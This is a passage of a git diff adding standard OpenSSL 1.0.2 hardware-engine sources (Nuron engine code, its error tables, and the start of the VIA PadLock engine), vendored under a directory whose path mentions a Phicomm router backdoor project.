+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#ifndef HEADER_GMP_ERR_H
+# define HEADER_GMP_ERR_H
+
+#ifdef  __cplusplus
+extern "C" {
+#endif
+
+/* BEGIN ERROR CODES */
+/*
+ * The following lines are auto generated by the script mkerr.pl. Any changes
+ * made after this point may be overwritten when the script is next run.
+ */
+static void ERR_load_GMP_strings(void);
+static void ERR_unload_GMP_strings(void);
+static void ERR_GMP_error(int function, int reason, char *file, int line);
+# define GMPerr(f,r) ERR_GMP_error((f),(r),__FILE__,__LINE__)
+
+/* Error codes for the GMP functions. */
+
+/* Function codes. */
+# define GMP_F_E_GMP_CTRL                                 100
+# define GMP_F_E_GMP_RSA_MOD_EXP                          101
+
+/* Reason codes. */
+# define GMP_R_CTRL_COMMAND_NOT_IMPLEMENTED               100
+# define GMP_R_KEY_CONTEXT_ERROR                          101
+# define GMP_R_MISSING_KEY_COMPONENTS                     102
+
+#ifdef  __cplusplus
+}
+#endif
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/e_nuron.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/e_nuron.c
new file mode 100644
index 0000000..3437f36
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/e_nuron.c
@@ -0,0 +1,436 @@
+/* crypto/engine/hw_nuron.c */
+/*
+ * Written by Ben Laurie for the OpenSSL Project, leaning heavily on Geoff
+ * Thorpe's Atalla implementation.
+ */
+/* ====================================================================
+ * Copyright (c) 2000-2001 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#include <stdio.h>
+#include <string.h>
+#include <openssl/crypto.h>
+#include <openssl/buffer.h>
+#include <openssl/dso.h>
+#include <openssl/engine.h>
+#ifndef OPENSSL_NO_RSA
+# include <openssl/rsa.h>
+#endif
+#ifndef OPENSSL_NO_DSA
+# include <openssl/dsa.h>
+#endif
+#ifndef OPENSSL_NO_DH
+# include <openssl/dh.h>
+#endif
+#include <openssl/bn.h>
+
+#ifndef OPENSSL_NO_HW
+# ifndef OPENSSL_NO_HW_NURON
+
+#  define NURON_LIB_NAME "nuron engine"
+#  include "e_nuron_err.c"
+
+static const char *NURON_LIBNAME = NULL;
+static const char *get_NURON_LIBNAME(void)
+{
+    if (NURON_LIBNAME)
+        return NURON_LIBNAME;
+    return "nuronssl";
+}
+
+static void free_NURON_LIBNAME(void)
+{
+    if (NURON_LIBNAME)
+        OPENSSL_free((void *)NURON_LIBNAME);
+    NURON_LIBNAME = NULL;
+}
+
+static long set_NURON_LIBNAME(const char *name)
+{
+    free_NURON_LIBNAME();
+    return (((NURON_LIBNAME = BUF_strdup(name)) != NULL) ? 1 : 0);
+}
+
+static const char *NURON_F1 = "nuron_mod_exp";
+
+/* The definitions for control commands specific to this engine */
+#  define NURON_CMD_SO_PATH               ENGINE_CMD_BASE
+static const ENGINE_CMD_DEFN nuron_cmd_defns[] = {
+    {NURON_CMD_SO_PATH,
+     "SO_PATH",
+     "Specifies the path to the 'nuronssl' shared library",
+     ENGINE_CMD_FLAG_STRING},
+    {0, NULL, NULL, 0}
+};
+
+typedef int tfnModExp(BIGNUM *r, const BIGNUM *a, const BIGNUM *p,
+                      const BIGNUM *m);
+static tfnModExp *pfnModExp = NULL;
+
+static DSO *pvDSOHandle = NULL;
+
+static int nuron_destroy(ENGINE *e)
+{
+    free_NURON_LIBNAME();
+    ERR_unload_NURON_strings();
+    return 1;
+}
+
+static int nuron_init(ENGINE *e)
+{
+    if (pvDSOHandle != NULL) {
+        NURONerr(NURON_F_NURON_INIT, NURON_R_ALREADY_LOADED);
+        return 0;
+    }
+
+    pvDSOHandle = DSO_load(NULL, get_NURON_LIBNAME(), NULL,
+                           DSO_FLAG_NAME_TRANSLATION_EXT_ONLY);
+    if (!pvDSOHandle) {
+        NURONerr(NURON_F_NURON_INIT, NURON_R_DSO_NOT_FOUND);
+        return 0;
+    }
+
+    pfnModExp = (tfnModExp *) DSO_bind_func(pvDSOHandle, NURON_F1);
+    if (!pfnModExp) {
+        NURONerr(NURON_F_NURON_INIT, NURON_R_DSO_FUNCTION_NOT_FOUND);
+        return 0;
+    }
+
+    return 1;
+}
+
+static int nuron_finish(ENGINE *e)
+{
+    free_NURON_LIBNAME();
+    if (pvDSOHandle == NULL) {
+        NURONerr(NURON_F_NURON_FINISH, NURON_R_NOT_LOADED);
+        return 0;
+    }
+    if (!DSO_free(pvDSOHandle)) {
+        NURONerr(NURON_F_NURON_FINISH, NURON_R_DSO_FAILURE);
+        return 0;
+    }
+    pvDSOHandle = NULL;
+    pfnModExp = NULL;
+    return 1;
+}
+
+static int nuron_ctrl(ENGINE *e, int cmd, long i, void *p, void (*f) (void))
+{
+    int initialised = ((pvDSOHandle == NULL) ? 0 : 1);
+    switch (cmd) {
+    case NURON_CMD_SO_PATH:
+        if (p == NULL) {
+            NURONerr(NURON_F_NURON_CTRL, ERR_R_PASSED_NULL_PARAMETER);
+            return 0;
+        }
+        if (initialised) {
+            NURONerr(NURON_F_NURON_CTRL, NURON_R_ALREADY_LOADED);
+            return 0;
+        }
+        return set_NURON_LIBNAME((const char *)p);
+    default:
+        break;
+    }
+    NURONerr(NURON_F_NURON_CTRL, NURON_R_CTRL_COMMAND_NOT_IMPLEMENTED);
+    return 0;
+}
+
+static int nuron_mod_exp(BIGNUM *r, const BIGNUM *a, const BIGNUM *p,
+                         const BIGNUM *m, BN_CTX *ctx)
+{
+    if (!pvDSOHandle) {
+        NURONerr(NURON_F_NURON_MOD_EXP, NURON_R_NOT_LOADED);
+        return 0;
+    }
+    return pfnModExp(r, a, p, m);
+}
+
+#  ifndef OPENSSL_NO_RSA
+static int nuron_rsa_mod_exp(BIGNUM *r0, const BIGNUM *I, RSA *rsa,
+                             BN_CTX *ctx)
+{
+    return nuron_mod_exp(r0, I, rsa->d, rsa->n, ctx);
+}
+#  endif
+
+#  ifndef OPENSSL_NO_DSA
+/*
+ * This code was liberated and adapted from the commented-out code in
+ * dsa_ossl.c. Because of the unoptimised form of the Atalla acceleration (it
+ * doesn't have a CRT form for RSA), this function means that an Atalla
+ * system running with a DSA server certificate can handshake around 5 or 6
+ * times faster/more than an equivalent system running with RSA. Just check
+ * out the "signs" statistics from the RSA and DSA parts of "openssl speed
+ * -engine atalla dsa1024 rsa1024".
+ */
+static int nuron_dsa_mod_exp(DSA *dsa, BIGNUM *rr, BIGNUM *a1,
+                             BIGNUM *p1, BIGNUM *a2, BIGNUM *p2, BIGNUM *m,
+                             BN_CTX *ctx, BN_MONT_CTX *in_mont)
+{
+    BIGNUM t;
+    int to_return = 0;
+
+    BN_init(&t);
+    /* let rr = a1 ^ p1 mod m */
+    if (!nuron_mod_exp(rr, a1, p1, m, ctx))
+        goto end;
+    /* let t = a2 ^ p2 mod m */
+    if (!nuron_mod_exp(&t, a2, p2, m, ctx))
+        goto end;
+    /* let rr = rr * t mod m */
+    if (!BN_mod_mul(rr, rr, &t, m, ctx))
+        goto end;
+    to_return = 1;
+ end:
+    BN_free(&t);
+    return to_return;
+}
+
+static int nuron_mod_exp_dsa(DSA *dsa, BIGNUM *r, BIGNUM *a,
+                             const BIGNUM *p, const BIGNUM *m, BN_CTX *ctx,
+                             BN_MONT_CTX *m_ctx)
+{
+    return nuron_mod_exp(r, a, p, m, ctx);
+}
+#  endif
+
+/* This function is aliased to mod_exp (with the mont stuff dropped). */
+#  ifndef OPENSSL_NO_RSA
+static int nuron_mod_exp_mont(BIGNUM *r, const BIGNUM *a, const BIGNUM *p,
+                              const BIGNUM *m, BN_CTX *ctx,
+                              BN_MONT_CTX *m_ctx)
+{
+    return nuron_mod_exp(r, a, p, m, ctx);
+}
+#  endif
+
+#  ifndef OPENSSL_NO_DH
+/* This function is aliased to mod_exp (with the dh and mont dropped). */
+static int nuron_mod_exp_dh(const DH *dh, BIGNUM *r,
+                            const BIGNUM *a, const BIGNUM *p,
+                            const BIGNUM *m, BN_CTX *ctx, BN_MONT_CTX *m_ctx)
+{
+    return nuron_mod_exp(r, a, p, m, ctx);
+}
+#  endif
+
+#  ifndef OPENSSL_NO_RSA
+static RSA_METHOD nuron_rsa = {
+    "Nuron RSA method",
+    NULL,
+    NULL,
+    NULL,
+    NULL,
+    nuron_rsa_mod_exp,
+    nuron_mod_exp_mont,
+    NULL,
+    NULL,
+    0,
+    NULL,
+    NULL,
+    NULL,
+    NULL
+};
+#  endif
+
+#  ifndef OPENSSL_NO_DSA
+static DSA_METHOD nuron_dsa = {
+    "Nuron DSA method",
+    NULL,                       /* dsa_do_sign */
+    NULL,                       /* dsa_sign_setup */
+    NULL,                       /* dsa_do_verify */
+    nuron_dsa_mod_exp,          /* dsa_mod_exp */
+    nuron_mod_exp_dsa,          /* bn_mod_exp */
+    NULL,                       /* init */
+    NULL,                       /* finish */
+    0,                          /* flags */
+    NULL,                       /* app_data */
+    NULL,                       /* dsa_paramgen */
+    NULL                        /* dsa_keygen */
+};
+#  endif
+
+#  ifndef OPENSSL_NO_DH
+static DH_METHOD nuron_dh = {
+    "Nuron DH method",
+    NULL,
+    NULL,
+    nuron_mod_exp_dh,
+    NULL,
+    NULL,
+    0,
+    NULL,
+    NULL
+};
+#  endif
+
+/* Constants used when creating the ENGINE */
+static const char *engine_nuron_id = "nuron";
+static const char *engine_nuron_name = "Nuron hardware engine support";
+
+/*
+ * This internal function is used by ENGINE_nuron() and possibly by the
+ * "dynamic" ENGINE support too
+ */
+static int bind_helper(ENGINE *e)
+{
+#  ifndef OPENSSL_NO_RSA
+    const RSA_METHOD *meth1;
+#  endif
+#  ifndef OPENSSL_NO_DSA
+    const DSA_METHOD *meth2;
+#  endif
+#  ifndef OPENSSL_NO_DH
+    const DH_METHOD *meth3;
+#  endif
+    if (!ENGINE_set_id(e, engine_nuron_id) ||
+        !ENGINE_set_name(e, engine_nuron_name) ||
+#  ifndef OPENSSL_NO_RSA
+        !ENGINE_set_RSA(e, &nuron_rsa) ||
+#  endif
+#  ifndef OPENSSL_NO_DSA
+        !ENGINE_set_DSA(e, &nuron_dsa) ||
+#  endif
+#  ifndef OPENSSL_NO_DH
+        !ENGINE_set_DH(e, &nuron_dh) ||
+#  endif
+        !ENGINE_set_destroy_function(e, nuron_destroy) ||
+        !ENGINE_set_init_function(e, nuron_init) ||
+        !ENGINE_set_finish_function(e, nuron_finish) ||
+        !ENGINE_set_ctrl_function(e, nuron_ctrl) ||
+        !ENGINE_set_cmd_defns(e, nuron_cmd_defns))
+        return 0;
+
+#  ifndef OPENSSL_NO_RSA
+    /*
+     * We know that the "PKCS1_SSLeay()" functions hook properly to the
+     * nuron-specific mod_exp and mod_exp_crt so we use those functions. NB:
+     * We don't use ENGINE_openssl() or anything "more generic" because
+     * something like the RSAref code may not hook properly, and if you own
+     * one of these cards then you have the right to do RSA operations on it
+     * anyway!
+     */
+    meth1 = RSA_PKCS1_SSLeay();
+    nuron_rsa.rsa_pub_enc = meth1->rsa_pub_enc;
+    nuron_rsa.rsa_pub_dec = meth1->rsa_pub_dec;
+    nuron_rsa.rsa_priv_enc = meth1->rsa_priv_enc;
+    nuron_rsa.rsa_priv_dec = meth1->rsa_priv_dec;
+#  endif
+
+#  ifndef OPENSSL_NO_DSA
+    /*
+     * Use the DSA_OpenSSL() method and just hook the mod_exp-ish bits.
+     */
+    meth2 = DSA_OpenSSL();
+    nuron_dsa.dsa_do_sign = meth2->dsa_do_sign;
+    nuron_dsa.dsa_sign_setup = meth2->dsa_sign_setup;
+    nuron_dsa.dsa_do_verify = meth2->dsa_do_verify;
+#  endif
+
+#  ifndef OPENSSL_NO_DH
+    /* Much the same for Diffie-Hellman */
+    meth3 = DH_OpenSSL();
+    nuron_dh.generate_key = meth3->generate_key;
+    nuron_dh.compute_key = meth3->compute_key;
+#  endif
+
+    /* Ensure the nuron error handling is set up */
+    ERR_load_NURON_strings();
+    return 1;
+}
+
+#  ifdef OPENSSL_NO_DYNAMIC_ENGINE
+static ENGINE *engine_nuron(void)
+{
+    ENGINE *ret = ENGINE_new();
+    if (!ret)
+        return NULL;
+    if (!bind_helper(ret)) {
+        ENGINE_free(ret);
+        return NULL;
+    }
+    return ret;
+}
+
+void ENGINE_load_nuron(void)
+{
+    /* Copied from eng_[openssl|dyn].c */
+    ENGINE *toadd = engine_nuron();
+    if (!toadd)
+        return;
+    ENGINE_add(toadd);
+    ENGINE_free(toadd);
+    ERR_clear_error();
+}
+#  endif
+
+/*
+ * This stuff is needed if this ENGINE is being compiled into a
+ * self-contained shared-library.
+ */
+#  ifndef OPENSSL_NO_DYNAMIC_ENGINE
+static int bind_fn(ENGINE *e, const char *id)
+{
+    if (id && (strcmp(id, engine_nuron_id) != 0))
+        return 0;
+    if (!bind_helper(e))
+        return 0;
+    return 1;
+}
+
+IMPLEMENT_DYNAMIC_CHECK_FN()
+    IMPLEMENT_DYNAMIC_BIND_FN(bind_fn)
+#  endif                        /* OPENSSL_NO_DYNAMIC_ENGINE */
+# endif                         /* !OPENSSL_NO_HW_NURON */
+#endif                          /* !OPENSSL_NO_HW */
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/e_nuron.ec b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/e_nuron.ec
new file mode 100644
index 0000000..cfa430d
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/e_nuron.ec
@@ -0,0 +1 @@
+L NURON		e_nuron_err.h			e_nuron_err.c
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/e_nuron_err.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/e_nuron_err.c
new file mode 100644
index 0000000..a02c4f0
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/e_nuron_err.c
@@ -0,0 +1,142 @@
+/* e_nuron_err.c */
+/* ====================================================================
+ * Copyright (c) 1999-2005 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+/*
+ * NOTE: this file was auto generated by the mkerr.pl script: any changes
+ * made to it will be overwritten when the script next updates this file,
+ * only reason strings will be preserved.
+ */
+
+#include <stdio.h>
+#include <openssl/err.h>
+#include "e_nuron_err.h"
+
+/* BEGIN ERROR CODES */
+#ifndef OPENSSL_NO_ERR
+
+# define ERR_FUNC(func) ERR_PACK(0,func,0)
+# define ERR_REASON(reason) ERR_PACK(0,0,reason)
+
+static ERR_STRING_DATA NURON_str_functs[] = {
+    {ERR_FUNC(NURON_F_NURON_CTRL), "NURON_CTRL"},
+    {ERR_FUNC(NURON_F_NURON_FINISH), "NURON_FINISH"},
+    {ERR_FUNC(NURON_F_NURON_INIT), "NURON_INIT"},
+    {ERR_FUNC(NURON_F_NURON_MOD_EXP), "NURON_MOD_EXP"},
+    {0, NULL}
+};
+
+static ERR_STRING_DATA NURON_str_reasons[] = {
+    {ERR_REASON(NURON_R_ALREADY_LOADED), "already loaded"},
+    {ERR_REASON(NURON_R_CTRL_COMMAND_NOT_IMPLEMENTED),
+     "ctrl command not implemented"},
+    {ERR_REASON(NURON_R_DSO_FAILURE), "dso failure"},
+    {ERR_REASON(NURON_R_DSO_FUNCTION_NOT_FOUND), "dso function not found"},
+    {ERR_REASON(NURON_R_DSO_NOT_FOUND), "dso not found"},
+    {ERR_REASON(NURON_R_NOT_LOADED), "not loaded"},
+    {0, NULL}
+};
+
+#endif
+
+#ifdef NURON_LIB_NAME
+static ERR_STRING_DATA NURON_lib_name[] = {
+    {0, NURON_LIB_NAME},
+    {0, NULL}
+};
+#endif
+
+static int NURON_lib_error_code = 0;
+static int NURON_error_init = 1;
+
+static void ERR_load_NURON_strings(void)
+{
+    if (NURON_lib_error_code == 0)
+        NURON_lib_error_code = ERR_get_next_error_library();
+
+    if (NURON_error_init) {
+        NURON_error_init = 0;
+#ifndef OPENSSL_NO_ERR
+        ERR_load_strings(NURON_lib_error_code, NURON_str_functs);
+        ERR_load_strings(NURON_lib_error_code, NURON_str_reasons);
+#endif
+
+#ifdef NURON_LIB_NAME
+        NURON_lib_name->error = ERR_PACK(NURON_lib_error_code, 0, 0);
+        ERR_load_strings(0, NURON_lib_name);
+#endif
+    }
+}
+
+static void ERR_unload_NURON_strings(void)
+{
+    if (NURON_error_init == 0) {
+#ifndef OPENSSL_NO_ERR
+        ERR_unload_strings(NURON_lib_error_code, NURON_str_functs);
+        ERR_unload_strings(NURON_lib_error_code, NURON_str_reasons);
+#endif
+
+#ifdef NURON_LIB_NAME
+        ERR_unload_strings(0, NURON_lib_name);
+#endif
+        NURON_error_init = 1;
+    }
+}
+
+static void ERR_NURON_error(int function, int reason, char *file, int line)
+{
+    if (NURON_lib_error_code == 0)
+        NURON_lib_error_code = ERR_get_next_error_library();
+    ERR_PUT_error(NURON_lib_error_code, function, reason, file, line);
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/e_nuron_err.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/e_nuron_err.h
new file mode 100644
index 0000000..aa7849c
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/e_nuron_err.h
@@ -0,0 +1,91 @@
+/* ====================================================================
+ * Copyright (c) 2001 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@openssl.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.openssl.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#ifndef HEADER_NURON_ERR_H
+# define HEADER_NURON_ERR_H
+
+#ifdef  __cplusplus
+extern "C" {
+#endif
+
+/* BEGIN ERROR CODES */
+/*
+ * The following lines are auto generated by the script mkerr.pl. Any changes
+ * made after this point may be overwritten when the script is next run.
+ */
+static void ERR_load_NURON_strings(void);
+static void ERR_unload_NURON_strings(void);
+static void ERR_NURON_error(int function, int reason, char *file, int line);
+# define NURONerr(f,r) ERR_NURON_error((f),(r),__FILE__,__LINE__)
+
+/* Error codes for the NURON functions. */
+
+/* Function codes. */
+# define NURON_F_NURON_CTRL                               100
+# define NURON_F_NURON_FINISH                             101
+# define NURON_F_NURON_INIT                               102
+# define NURON_F_NURON_MOD_EXP                            103
+
+/* Reason codes. */
+# define NURON_R_ALREADY_LOADED                           100
+# define NURON_R_CTRL_COMMAND_NOT_IMPLEMENTED             101
+# define NURON_R_DSO_FAILURE                              102
+# define NURON_R_DSO_FUNCTION_NOT_FOUND                   103
+# define NURON_R_DSO_NOT_FOUND                            104
+# define NURON_R_NOT_LOADED                               105
+
+#ifdef  __cplusplus
+}
+#endif
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/e_padlock.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/e_padlock.c
new file mode 100644
index 0000000..2898e4c
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/e_padlock.c
@@ -0,0 +1,1266 @@
+/*-
+ * Support for VIA PadLock Advanced Cryptography Engine (ACE)
+ * Written by Michal Ludvig <michal@logix.cz>
+ *            http://www.logix.cz/michal
+ *
+ * Big thanks to Andy Polyakov for a help with optimization,
+ * assembler fixes, port to MS Windows and a lot of other
+ * valuable work on this engine!
+ */
+
+/* ====================================================================
+ * Copyright (c) 1999-2001 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#include <stdio.h>
+#include <string.h>
+
+#include <openssl/opensslconf.h>
+#include <openssl/crypto.h>
+#include <openssl/dso.h>
+#include <openssl/engine.h>
+#include <openssl/evp.h>
